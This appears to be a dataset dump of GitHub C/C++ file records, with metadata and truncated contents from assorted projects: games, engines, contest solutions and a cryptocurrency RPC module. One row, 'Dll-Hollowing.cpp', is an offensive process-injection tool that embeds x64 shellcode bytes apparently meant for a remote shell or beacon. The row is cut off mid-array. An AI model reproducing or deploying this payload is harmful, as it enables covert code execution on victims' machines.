blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 264 | content_id stringlengths 40 40 | detected_licenses listlengths 0 85 | license_type stringclasses 2
values | repo_name stringlengths 5 140 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 986
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 3.89k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 145
values | src_encoding stringclasses 34
values | language stringclasses 1
value | is_vendor bool 1
class | is_generated bool 2
classes | length_bytes int64 3 10.4M | extension stringclasses 122
values | content stringlengths 3 10.4M | authors listlengths 1 1 | author_id stringlengths 0 158 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2ebabf6d28ed0b70a07e608604c30628a62de2d6 | 7c6ef0c396a48d115ed023b186e75fccaf24ab91 | /Shooting game/s5216712_A2_Resubmission/s5216712_A2_Resubmission/Background.h | 994f40417b06f0ce1cf1b846b1005b9a4431d087 | [] | no_license | askarihriz/DuckShooter | 50d8e766d291c09a3c949e1b336d5eca16c0aded | 53c5c4639b99a225e376dba273b965630dc4da4f | refs/heads/main | 2023-06-29T21:04:50.903882 | 2021-08-03T13:12:50 | 2021-08-03T13:12:50 | 392,321,679 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 264 | h | #pragma once
#include"Object.h"
class Background: public Object
{
private:
public:
void Reset();
void Render(SDL_Renderer* ren);
void AimRender(SDL_Renderer* ren);
void GunRender(SDL_Renderer* ren);
void AimUpdate(int X, int Y);
void GunUpdate(int X);
};
| [
"askarihriz@gmail.com"
] | askarihriz@gmail.com |
66701ebe3511f0a115a546a95a453c0569b07171 | f152da8d4eeccbbedcf0c8f420c8e49254178ba1 | /src/rpcdump.cpp | 7102998ebb10bb9180ff03c8d0151a81162e0763 | [
"MIT"
] | permissive | pathondev/pathon | 1ace986ce91d23d3174ff8db23068032c690f783 | d4000d3b4606b7fc777bbe39b0651703bf746bcf | refs/heads/master | 2020-03-12T22:21:47.903858 | 2018-04-24T17:33:11 | 2018-04-24T17:33:11 | 130,841,319 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 18,857 | cpp | // Copyright (c) 2009-2014 The Bitcoin developers
// Copyright (c) 2014-2015 The Pat developers
// Copyright (c) 2015-2017 The PIVX developers
// Copyright (c) 2015-2017 The PAT developers
// Distributed under the MIT software license, see the accompanying
// file COPYING or http://www.opensource.org/licenses/mit-lice... | [
"38689765+pathondev@users.noreply.github.com"
] | 38689765+pathondev@users.noreply.github.com |
00852221ab659d4f79af95a2f098f093affb1f17 | b581675ebe3633ea7d6e63ac7898335dc4dcd28c | /chef/CHEFSTLT.cpp | 681c302751429aa722a120cb580e62779b42fcc9 | [] | no_license | udit043/little_bit_competitive | c219c1d77a48c87ac4b8384c5c09fdacbd1fe8c2 | b54279e75c54337bd4d89f9a44489bf8ad00635b | refs/heads/master | 2021-07-12T18:43:29.056528 | 2021-05-29T12:17:30 | 2021-05-29T12:17:30 | 86,187,789 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 445 | cpp | #include <bits/stdc++.h>
using namespace std;
int main()
{
int t;
cin >> t;
while(t--)
{
string s1,s2;
cin >> s1 >> s2;
int i,qb=0,qs=0,same=0,dif=0;
for(i=0; i<s1.length(); i++)
{
if(s1[i] == s2[i])
{
same++;
if(s1[i] == '?')
qb++;
}
if(s1[i] != s2[i])
{
dif++;
if( (... | [
"udit043.ur@gmail.com"
] | udit043.ur@gmail.com |
12881393f4bae89086b1f6e21624ef0f06133897 | 1fb987c42741ed9e54e34bdff508266eb40580ae | /prob12/main.cpp | a18206b4b8bb4d6bfb149fb2061d69c46c68b686 | [] | no_license | noeliampgar/MARP-Juez-2C | 98ab1b19a786cf4faeac70353bc5c9a12bd558a7 | a3616b8e66a1b42031e6de91160043a801bf9b09 | refs/heads/main | 2023-08-14T20:39:58.324724 | 2021-09-29T10:37:18 | 2021-09-29T10:37:18 | 411,625,615 | 4 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 1,939 | cpp | #include <iostream>
#include <algorithm>
#include <vector>
#include <iomanip>
#include <math.h>
#include <climits>
#include <fstream>
#include <queue>
#include <stdio.h>
#include <string.h>
#include <list>
#include "Matriz.h"
using namespace std;
struct tMoneda {
int valor, cantidad;
};
bool resuelveCaso() {
int... | [
"noeliamp@ucm.es"
] | noeliamp@ucm.es |
c8c4096357431b88398c0dc33e8f7cd05ab59732 | f49eb02fff30a48186bdb2243b0a4a0cb39a59c1 | /src/Tables/Table_02.cpp | c5924ae3ea57aa130593a6b2caae2656115236ff | [
"BSD-3-Clause"
] | permissive | hietwll/gamer | 18b3894f56b5f50e7c92d4fafff903b674155b45 | d6ae404ba1cbd8b4c1d6269ddb29efd1fc5d1a48 | refs/heads/master | 2021-08-31T10:55:35.427127 | 2017-12-21T03:43:23 | 2017-12-21T03:43:23 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 2,339 | cpp | #include "GAMER.h"
//-------------------------------------------------------------------------------------------------------
// Function : TABLE_02
// Description : Return w0, or w1 according to the inputs "LocalID" and "dim"
//
// Note : This table is particularly useful when the required values depe... | [
"hyschive@gmail.com"
] | hyschive@gmail.com |
eac14a522c5af310ff4548e8c20e98c75301421c | 5dbba49dda2c936d70008d8c534d5fe8c5957a35 | /Lab2/ArrChange.cpp | 7a406275f216401698567b3b3d97527e6582656a | [] | no_license | LORRIKAN/Labs-RPS | 75628d90f2e4f8b5071d9fceea25915c18620dd9 | 6f7aec79f4624c36ceb0e51500ed1bcc93db99c1 | refs/heads/master | 2022-12-07T02:23:26.320286 | 2020-08-31T09:39:17 | 2020-08-31T09:39:17 | 286,821,470 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 4,798 | cpp | #include <iostream>
#include "ArrOutput.h"
using namespace std;
enum { comparesColumn, swapsColumn, bubbleLine = 0, selectLine, insertLine, shellLine, quickLine };
enum { bubbleSort, selectSort, insertSort, shellSort, quickSort };
struct LinkValuesAndSum {
int value;
int sum;
bool listed = false;
};
void BubbleS... | [
"zobnin.ilya@yandex.ru"
] | zobnin.ilya@yandex.ru |
859f66b6ff6570ba0faf9447d67b0ea04a9326c3 | 5bcb9c443543a046b0fb79f8ab02d21752f25b0f | /xogeni/LevelGenerator/Room.hpp | 84bcd8d0dc4f0b0d94c8c04888948e213ed290c2 | [] | no_license | jordansavant/roguezombie | 69739a2cd6f86345ba808adc2b9287b3b9e37e3d | 01cf466eeab7dbf108886eb11f8063c82932a0d7 | refs/heads/master | 2020-04-18T19:35:56.803764 | 2019-01-27T14:08:47 | 2019-01-27T14:08:47 | 167,715,791 | 1 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 424 | hpp | #pragma once
#ifndef XG_ROOM_H
#define XG_ROOM_H
#include <vector>
namespace XoGeni
{
class Room
{
public:
Room();
~Room();
Room(unsigned int x, unsigned int y, unsigned int width, unsigned int height);
unsigned int x, y;
unsigned int width, height;
unsig... | [
"md5madman@gmail.com"
] | md5madman@gmail.com |
530ae2376cafe30db84882fb6ad4cf9564f20293 | a880c86867a91e290f9e84ea59aafc8fb3c1a443 | /chrono/chrono-dev/src/chrono_vehicle/wheeled_vehicle/suspension/ChHendricksonPRIMAXX.cpp | 0ad398b105d7efe39e0a90545b4528aa506c9859 | [
"BSD-3-Clause"
] | permissive | ShuoHe97/CS239-Final-Project | 67b987a69275016027b744c178e19b4f0b0edfda | 6558db26d00abb0eb2f6c82b9b6025386ecf19b9 | refs/heads/main | 2023-02-02T13:30:58.615194 | 2020-12-19T00:16:27 | 2020-12-19T00:16:27 | 322,532,657 | 2 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 31,247 | cpp | // =============================================================================
// PROJECT CHRONO - http://projectchrono.org
//
// Copyright (c) 2014 projectchrono.org
// All rights reserved.
//
// Use of this source code is governed by a BSD-style license that can be found
// in the LICENSE file at the top level of t... | [
"she77@wisc.edu"
] | she77@wisc.edu |
b61ef0ed16a4f5f9fd7d0fd1b0f2d8a5ed969d06 | a20085857057966dcaa33483f1f643d2f55ae6fa | /OpenGL_Game/src/meteo/control_meteo.h | fb760e4007c07f4e037491116287a31142fbeefc | [
"MIT"
] | permissive | MoriyamaHB/OpenGL_Game | eb79a8213e5604d7168fa50e32ce4dff4ef4943b | d286c68ca67bd49110744383265cb2f46d1126fd | refs/heads/master | 2021-05-01T00:25:00.921517 | 2017-05-08T11:25:37 | 2017-05-08T11:25:37 | 56,022,538 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 627 | h | #ifndef OPENGLGAME_METEO_CONTROLMETEO_H_
#define OPENGLGAME_METEO_CONTROLMETEO_H_
class Fps;
class Meteo;
namespace control_meteo {
const int kMaxMeteoNum = 1000; //隕石の最大出現数
const double kAddScoreMaxDistance = 5; //スコアを加算するプレイヤーと隕石の最大距離
const int kAddScoreFactor = 13;
//実際に隕石を格納するデータ構造
//当たり判定に困り仕方なくグロ... | [
"mhrbykm122@yahoo.co.jp"
] | mhrbykm122@yahoo.co.jp |
e3886518a4a00bf570f1b9e6644f452f54c195f2 | c80e4dea4548de89d32f2abd6ca58812670ecc7b | /src/regal/RegalDebugInfo.h | 1488be6ecd55fbc12c114266d3197a09d4cc9c94 | [
"Unlicense",
"MIT",
"LicenseRef-scancode-glut",
"BSD-3-Clause",
"SGI-B-2.0",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause"
] | permissive | chinmaygarde/regal | 971699cc8d991633b7257ce9ced2b4d65dd6d9b2 | db0832075bd78241afe003b9c1b8f6ac0051370b | refs/heads/master | 2021-01-17T04:42:10.354459 | 2012-10-10T09:08:13 | 2012-10-10T09:08:13 | 6,150,566 | 1 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 3,173 | h | /*
Copyright (c) 2011 NVIDIA Corporation
Copyright (c) 2011-2012 Cass Everitt
Copyright (c) 2012 Scott Nations
Copyright (c) 2012 Mathias Schott
Copyright (c) 2012 Nigel Stewart
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the... | [
"nigels@users.sourceforge.net"
] | nigels@users.sourceforge.net |
239133926860e8b0b920f597566db96dd56b6469 | 3da7e3237af354d9e51c0f7dcdde2b8ad976617a | /3rdparty/Effekseer/Effekseer/Effekseer/Effekseer.Manager.cpp | 8f8be5e28233791f7fc1da8a36d00ebde293d4b9 | [] | no_license | 9MW/effekseerDE | 072a4ba4a467cd62b75db93be44691f6c2851250 | 62bc6f80ba3f977d7dc5408fcfca09747383df27 | refs/heads/master | 2023-01-07T13:36:02.867639 | 2020-11-17T06:42:16 | 2020-11-17T06:42:16 | 313,511,440 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 46,380 | cpp |
#include "Effekseer.Effect.h"
#include "Effekseer.EffectImplemented.h"
#include "SIMD/Effekseer.SIMDUtils.h"
#include "Effekseer.EffectNode.h"
#include "Effekseer.Instance.h"
#include "Effekseer.InstanceChunk.h"
#include "Effekseer.InstanceContainer.h"
#include "Effekseer.InstanceGlobal.h"
#include "Effekseer.Insta... | [
"9mrswang9@gmail.com"
] | 9mrswang9@gmail.com |
b7d3ea77832041fc4b72980263e1c55e03b51aac | fbe1a45cefd8ce965b81870bc0ff3632ce3967a4 | /hex_3_maartje/board.cpp | c6b8f1dd8063939a44353d918a1aa5c86099f059 | [] | no_license | maartjeth/summerschool | 1c651bcc5686f4895b70c23c3bfe01b59da6f7ee | 87c88e8a370c9c09c2a0844a4aefef9c7470dfbe | refs/heads/master | 2020-05-31T17:01:54.337592 | 2015-07-10T13:18:50 | 2015-07-10T13:18:50 | 38,610,815 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 3,487 | cpp | /*
Author: Maartje ter Hoeve
Class that constructs the board.
*/
#include <iostream>
#include <stdexcept>
#include "block.h"
#include "board.h"
using namespace std;
//CLASS BLOCK
Block::Block()
{
player = -1;
}
// Constructor: Set player to a
Block::Block(int a)
{
try
{
if ((a == 1) || (a == ... | [
"maartjeterhoeve@gmail.com"
] | maartjeterhoeve@gmail.com |
409dbc547f626d14a802f018bc8c721b141f96c8 | aae79375bee5bbcaff765fc319a799f843b75bac | /yukicoder_0xx/43.cpp | 54b91e8a50af4b938a753edc51840a16a00404d2 | [] | no_license | firewood/topcoder | b50b6a709ea0f5d521c2c8870012940f7adc6b19 | 4ad02fc500bd63bc4b29750f97d4642eeab36079 | refs/heads/master | 2023-08-17T18:50:01.575463 | 2023-08-11T10:28:59 | 2023-08-11T10:28:59 | 1,628,606 | 21 | 6 | null | null | null | null | UTF-8 | C++ | false | false | 909 | cpp | #include <iostream>
#include <algorithm>
#include <sstream>
#include <numeric>
using namespace std;
int main(int argc, char *argv[]) {
string s;
getline(cin, s);
stringstream sa(s);
int N;
sa >> N;
string res[6];
for (int i = 0; i < N; ++i) {
getline(cin, res[i]);
}
int ans = N;
int m = 1 << (N * (N - 1)... | [
"karamaki@gmail.com"
] | karamaki@gmail.com |
629476b5237d66faac6eb101573b94ac770590ae | 9adbc22c95b97908a453edd2ef547cf78ae34c27 | /Dll-Hollowing/Dll-Hollowing.cpp | f5b94ad5f8f6a301044ffabf6a3afe9e969f5064 | [] | no_license | idiotc4t/Dll-Hollowing | 8875d3288c1155d0a04863a449f686c3fc37de42 | 41969b87f5295ecde01f1470d2eda6da40d6d25c | refs/heads/master | 2022-07-03T14:45:57.131220 | 2020-05-09T06:52:40 | 2020-05-09T06:52:40 | 262,508,844 | 2 | 1 | null | null | null | null | UTF-8 | C++ | false | false | 4,117 | cpp | #include <iostream>
#include <Windows.h>
#include <psapi.h>
char shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1... | [
"1959132915@qq.com"
] | 1959132915@qq.com |
94b7ab077cb44a39d77b04e842d2ca5916d7257a | 9f16950a070174c4ad6419b6aa48e0b3fd34a09e | /users/marcel/sceneedit1/components/transformComponent.cpp | 7126249e06d6f26bd7fcd644d061daeec9a7af5d | [] | no_license | marcel303/framework | 594043fad6a261ce2f8e862f921aee1192712612 | 9459898c280223b853bf16d6e382a6f7c573e10e | refs/heads/master | 2023-05-14T02:30:51.063401 | 2023-05-07T07:57:12 | 2023-05-07T10:16:34 | 112,006,739 | 53 | 1 | null | 2020-01-13T18:48:32 | 2017-11-25T13:45:56 | C++ | UTF-8 | C++ | false | false | 1,363 | cpp | #include "Mat4x4.h"
#include "Quat.h"
#include "scene.h"
#include "sceneNodeComponent.h"
#include "transformComponent.h"
#include <math.h>
TransformComponentMgr g_transformComponentMgr;
void TransformComponentMgr::calculateTransformsTraverse(Scene & scene, SceneNode & node, const Mat4x4 & globalTransform) const
{
au... | [
"marcel303@gmail.com"
] | marcel303@gmail.com |
33d93bf6eacf7e5ac09c231dda414a3cf38c70af | 04b1803adb6653ecb7cb827c4f4aa616afacf629 | /components/arc/app_permissions/arc_app_permissions_bridge.cc | c36978c4c8e1a84c174c8d21836ce33b3623336f | [
"BSD-3-Clause"
] | permissive | Samsung/Castanets | 240d9338e097b75b3f669604315b06f7cf129d64 | 4896f732fc747dfdcfcbac3d442f2d2d42df264a | refs/heads/castanets_76_dev | 2023-08-31T09:01:04.744346 | 2021-07-30T04:56:25 | 2021-08-11T05:45:21 | 125,484,161 | 58 | 49 | BSD-3-Clause | 2022-10-16T19:31:26 | 2018-03-16T08:07:37 | null | UTF-8 | C++ | false | false | 1,510 | cc | // Copyright 2019 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "components/arc/app_permissions/arc_app_permissions_bridge.h"
#include "base/memory/singleton.h"
#include "components/arc/arc_browser_context_ke... | [
"sunny.nam@samsung.com"
] | sunny.nam@samsung.com |
355d0eb4d0e97091ea1dbff1733d4fd84c42f9b4 | 451acc9feaa52466ad4df8e68db2b787d5b18ac7 | /Ponteiros/Teste2/Teste2/Origem.cpp | e910a89a13b249a1076746d800271d3b0f7799ac | [] | no_license | figueiredods/EstruturaDeDados_PSC_2019 | 05630c679900201647bab47ecfa06d314c105274 | 3821badf2e355f78bd29e0486a77ce02c17872c1 | refs/heads/master | 2020-06-04T01:15:58.185281 | 2019-06-05T20:38:51 | 2019-06-05T20:38:51 | 191,811,357 | 0 | 0 | null | 2019-06-13T18:07:10 | 2019-06-13T18:07:09 | null | UTF-8 | C++ | false | false | 561 | cpp | #include <stdio.h>
#include <stdlib.h>
void reajusta20(float *preco, float *reajuste);
int main()
{
float val_preco, val_reaj;
do
{
printf("\nInsira o preco atual: ");
scanf_s("%f", &val_preco);
/* Envia os enderecos */
reajusta20(&val_preco, &val_reaj);
printf("\n O preco novo eh %.... | [
"noreply@github.com"
] | figueiredods.noreply@github.com |
92024436c283d7cfdd78ccaccf3be63876ec6aac | 7c304a8da2dea6aad1e7c2299febe336019f8dc6 | /Client/Inc/Actor/player.h | 92aa1516497cc26f01f9d96b3b6e31f60c85c78e | [] | no_license | kwangminy27/KEngine | 4b070a9dcb27a16b4917c6dce92dccfa55554d32 | d95fbc98d183f63f8fb29e0d9d869c8db1b694e2 | refs/heads/master | 2020-04-24T04:21:37.841487 | 2019-02-27T14:50:13 | 2019-02-27T14:50:13 | 164,522,761 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 608 | h | #pragma once
namespace K
{
class Player final : public ActorClient
{
friend class ObjectManager;
public:
virtual void Initialize() override;
virtual APTR Clone() const override;
virtual void Serialize(InputMemoryStream& _imstream) override;
virtual void Serialize(OutputMemoryStream& _omstream) override;... | [
"kwangminy27@outlook.com"
] | kwangminy27@outlook.com |
fa52aad4fb6e6204abd7852771e241742dec9384 | 8d705d8d3fb123cc4ec7e84e52821c5c1883d380 | /ICPC.Regional/2005.Central_Europe/3527.cpp | 6bb1723c1ea28b7d90e2ca655c1139105f8a4610 | [] | no_license | ailyanlu1/ACM-ICPC-OJ-Code | 446ceff5ad94d64391ce4d86bb706023323cb1f1 | 344b2c92f75b428d0241ba732c43de780d08df40 | refs/heads/master | 2020-03-22T21:09:01.656511 | 2015-03-11T00:10:27 | 2015-03-11T00:10:27 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 789 | cpp | // CII 3527
// 2005 Central Europe: Find the Clones
#include <cstdio>
#include <cstring>
#include <algorithm>
using namespace std;
#define N 20005
typedef long long ll;
int n, m;
int map[100];
short ans[N];
ll num[N];
void get(int x) {
num[x] = 0;
for (int i = 0; i < m; i++) {
char ch = getchar();
num[x] = (num... | [
"gz.pkkj@gmail.com"
] | gz.pkkj@gmail.com |
4cdac48c904b260dc78a0b231f683faa29c10b17 | 219d59bff317c531670b45ff70f2e6e6f4e36281 | /src/lcmtypes/maebot_laser_scan_t.hpp | ce0656e2c1b984c80ca3cdf8f384e9961dfaea74 | [] | no_license | medstone/EECS467 | c44f8563951d087f01251d5fba2e70832d51b46a | fb3c9574e2ed376189c7c83343e0df89b6ed2e64 | refs/heads/master | 2021-01-10T07:34:41.334660 | 2016-01-12T23:31:13 | 2016-01-12T23:31:13 | 49,513,716 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 6,703 | hpp | /** THIS IS AN AUTOMATICALLY GENERATED FILE. DO NOT MODIFY
* BY HAND!!
*
* Generated by lcm-gen
**/
#include <lcm/lcm_coretypes.h>
#ifndef __maebot_laser_scan_t_hpp__
#define __maebot_laser_scan_t_hpp__
#include <vector>
class maebot_laser_scan_t
{
public:
int64_t utime;
int32_t num... | [
"medstone@caen-vnc19.engin.umich.edu"
] | medstone@caen-vnc19.engin.umich.edu |
bb04caedd407d2881813f7318c122862e2fdf17b | abaf4a58495e28d0434e72f6cb1533f480e1a1bf | /include/xUnit++/xUnitAssert.h | 59249b6de35997453d1d6bc423e1c642881a545b | [
"MIT"
] | permissive | FredrikL/libentity | 211f1ebae6091cc0c5da68519c8611a2b8dd9a6b | bf5bdbc32a07f458da404353b9599c6f6cf43311 | refs/heads/master | 2021-01-16T22:56:26.252448 | 2013-08-10T23:58:19 | 2013-08-10T23:58:19 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 24,139 | h | #ifndef XUNITASSERT_H_
#define XUNITASSERT_H_
#if defined(_MSC_VER)
# if !defined(_ALLOW_KEYWORD_MACROS)
# define _ALLOW_KEYWORD_MACROS
# endif
#define noexcept(x)
#endif
#include <algorithm>
#include <exception>
#include <functional>
#include <memory>
#include <sstream>
#include <stdexcept>
#include... | [
"dan@emergent-design.co.uk"
] | dan@emergent-design.co.uk |
0a69129c95cd586162a360dc1425c567d44a3d8f | 3ba08f16fe7fd3e55e7d73539698266db6559b9e | /tests/src/wxchartstestsframe.h | c0040cd68862c6e0f130aada2b6c6eb531ab6125 | [
"MIT"
] | permissive | Kvaz1r/wxCharts | 967fe849bb38cde816b0ba3c44d7319e07118dc7 | 273a28b35ccf059d35d37762278e9c3115a79a32 | refs/heads/master | 2020-04-04T20:08:46.567331 | 2019-01-17T14:45:12 | 2019-01-17T14:45:12 | 58,365,538 | 0 | 0 | null | 2016-05-09T09:39:17 | 2016-05-09T09:39:17 | null | UTF-8 | C++ | false | false | 3,008 | h | /*
Copyright (c) 2018-2019 Xavier Leclercq
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, me... | [
"xavier.leclercq@needfulsoftware.com"
] | xavier.leclercq@needfulsoftware.com |
8130e7d1bd6d6f713d8d2eddde10c53eb34169f7 | 7c2c9d48a3f93f42b134a29d06a9b076ebedf822 | /AC/09500/9520.cpp | e6778947e5c5a488c5a57fbb1a9dd7404cb47a63 | [] | no_license | devnok/BOJ | b2f44d8f337df04ddc5bc5c81ff89d00fc0f2d9f | ee20d43fdac24eb5a9dd9b80676789f9f169bdb0 | refs/heads/master | 2022-08-09T10:07:36.835458 | 2022-08-02T12:04:55 | 2022-08-02T12:04:55 | 224,916,286 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 849 | cpp | #include<iostream>
#include<vector>
#include<algorithm>
#include<string.h>
using namespace std;
typedef pair<int,int> pii;
typedef long long int lld;
const int MAXN = 1501;
const int INF = 987654321;
int n,adj[MAXN][MAXN],dp[MAXN][MAXN],ans=INF;
int main(){
ios_base::sync_with_stdio(false); cout.tie(NULL); cin.t... | [
"ha819ha.dev@gmail.com"
] | ha819ha.dev@gmail.com |
3074d675067e3c9ad102fa6f845175d563ce657f | 9546b2c00eaefbe9eb57f4f14711214b2009dc3b | /ChronoEngine/src/unit_FEA/ChMatrixCorotation.h | 1e7bfafd20e7c4dde3c33472a973e931f68db0c5 | [
"BSD-3-Clause"
] | permissive | globus000/cew | 671096366385805a8f4dbe2d2f8c185edb4163cb | 13d2a3c007239c8caccab2c5198ef5e8147369e1 | refs/heads/master | 2016-09-05T09:18:55.011986 | 2015-04-26T16:45:00 | 2015-04-26T16:45:00 | 34,566,328 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 6,449 | h | //
// PROJECT CHRONO - http://projectchrono.org
//
// Copyright (c) 2013 Project Chrono
// All rights reserved.
//
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file at the top level of the distribution
// and at http://projectchrono.org/license-chrono.txt.
//
//
// ... | [
"zr_contact@mail.ru"
] | zr_contact@mail.ru |
1028acdfee958e0f765fe2a2e8120f3bc1b36832 | 149489e12a2f209e33a82684518785540b3508b8 | /src/arch/arm/vtophys.cc | 8728678193de9f0d86336d7c953d3766c324f7f1 | [
"BSD-3-Clause",
"LicenseRef-scancode-proprietary-license",
"LGPL-2.0-or-later",
"MIT"
] | permissive | FPSG-UIUC/SPT | 8dac03b54e42df285d774bfc2c08be3123ea0dbb | 34ec7b2911078e36284fa0d35ae1b5551b48ba1b | refs/heads/master | 2023-04-15T07:11:36.092504 | 2022-05-28T21:34:30 | 2022-05-28T21:34:30 | 405,761,413 | 4 | 1 | BSD-3-Clause | 2023-04-11T11:44:49 | 2021-09-12T21:54:08 | C++ | UTF-8 | C++ | false | false | 4,302 | cc | /*
* Copyright (c) 2010, 2012-2013 ARM Limited
* All rights reserved
*
* The license below extends only to copyright in the software and shall
* not be construed as granting a license to any other intellectual
* property including but not limited to intellectual property relating
* to a hardware implementation o... | [
"rutvikc2@midgar.cs.illinois.edu"
] | rutvikc2@midgar.cs.illinois.edu |
75bd260cace7dcef824c2aa88325ae5a7cd19157 | feae100972a9b801150fef94d9570b74ee917360 | /tp1/Paddle.h | 983f9f7b66ca8745d3dda1fdfef1a6ce7c48e93a | [] | no_license | ivan94/UFMG-161-CG | 44accd22b72edc9c830eb028df6bae3485691e79 | c49b98464140fbfc99ad74d18a1ba76775f18618 | refs/heads/master | 2016-09-13T16:12:19.450639 | 2016-05-10T02:07:57 | 2016-05-10T02:07:57 | 58,139,258 | 0 | 1 | null | 2016-05-08T20:27:20 | 2016-05-05T15:03:02 | C++ | UTF-8 | C++ | false | false | 560 | h | #pragma once
#include "Color.h"
class Paddle {
private:
const int originalWidth;
int xPos, yPos, xSpeed;
int height, width;
int minXLimit, maxXLimit;
int maxSpeed;
int sizeFrameCount;
Color color;
public:
Paddle(int x, int y, int w, int h, int minX, int maxX, Color c);
int getXPos();
int getYPos();
int get... | [
"leonomanf@gmail.com"
] | leonomanf@gmail.com |
6d903274aae629ae95cc320e88d17cba1fee5b52 | 7ee1d46e0113cb79a7187678a09a799be74efb98 | /a.cpp | 715a12ba8375fc986cd6e2060d526850eb10a026 | [] | no_license | aayush1010/Codes | bc7646bded879d8dc23e9bd132491be4f17c85b8 | 32d87f01f1ae071f171283d623e2780fb9cef910 | refs/heads/master | 2021-01-22T10:15:07.090072 | 2019-01-25T11:50:47 | 2019-01-25T11:50:47 | 102,337,184 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 104 | cpp | #include<iostream>
using namespace std;
int main(){
cout << "aayush";
return 0;
}
| [
"noreply@github.com"
] | aayush1010.noreply@github.com |
6711ea269e738d1cf283ff786fa067ca478e5184 | f7d64591d61f05d9e4f1567761e7dabe8b452d04 | /codes/Graph/virtual_tree.cpp | 92c8ea5c1d42df5848155d18b0311d550327e16a | [] | no_license | kouke0638/kiseki_ICPC_codebook | ec5c38f4a3c8964dc9edb8fe86279b1784b73833 | cfe59ac5c10bf5670e71a0bcfe64447f5edf087c | refs/heads/master | 2023-07-02T10:59:17.679902 | 2021-07-31T18:23:49 | 2021-07-31T18:23:49 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 674 | cpp | inline bool cmp(const int &i, const int &j) {
return dfn[i] < dfn[j];
}
void build(int vectrices[], int k) {
static int stk[MAX_N];
sort(vectrices, vectrices + k, cmp);
stk[sz++] = 0;
for (int i = 0; i < k; ++i) {
int u = vectrices[i], lca = LCA(u, stk[sz - 1]);
if (lca == stk[sz - 1]) stk[sz++] = u;
... | [
"ty1208chiang@gmail.com"
] | ty1208chiang@gmail.com |
20869e293c33de8fe87a41bc77ce2a33eb380fbb | 2ba5ada2efe9f0611ca8d75437b02a41765a1a45 | /flatlib/flWiiLib.h | 1b23c483cada3cbea5b18c0e445bae092de9b2f9 | [] | no_license | hiroog/WBHealthMeter | 6afdc2c4d78dda7a4b008a765bc1bc5e2472af88 | 3140a70c307e02fca45f1de2e341838f012241a8 | refs/heads/master | 2020-12-24T10:31:29.574158 | 2016-11-08T03:55:49 | 2016-11-08T03:55:49 | 73,147,007 | 2 | 0 | null | null | null | null | SHIFT_JIS | C++ | false | false | 9,610 | h | // 2007 Hiroyuki Ogasawara
// vim:ts=4 sw=4:
#ifndef FL_FLWIILIB_H_
#define FL_FLWIILIB_H_
//-----------------------------------------------------------------------------
//-----------------------------------------------------------------------------
/*!
@brief
Wii コントローラの詳細情報を参照します。
*/
class flWiiLi... | [
"hiroog@flatlib.jp"
] | hiroog@flatlib.jp |
258f04f33d8730fc351bf14114ce1ff127dc827d | 693ac1ea02dac0360259844946e6f1d20442e0a5 | /Analyser/GeantAnalysis.cc | e65eee5c4765d78af14acc0ecea5e0146270c027 | [] | no_license | SangMLee/GEM_Geant4_bkg | c8609a3a2761d19e761739f16b989754ecaa705f | 4f39c42ce6c9ccc8cfa6f122836b98dda4e1b6a0 | refs/heads/master | 2020-03-27T15:19:36.847343 | 2018-08-10T11:21:53 | 2018-08-10T11:21:53 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 1,286 | cc | #define GeantAnalysis_cxx
#include "GeantAnalysis.h"
#include <iostream>
using namespace std;
void GeantAnalysis::Analysis()
{
Long64_t nEntries = fChain->GetEntries();
ResetBranch();
for(Long64_t i = 0; i < nEntries; i++)
{
ResetBranch();
fChain->GetEntry(i);
hPrimaryEne->Fill(primaryEne);
i... | [
"yck.kang@gmail.com"
] | yck.kang@gmail.com |
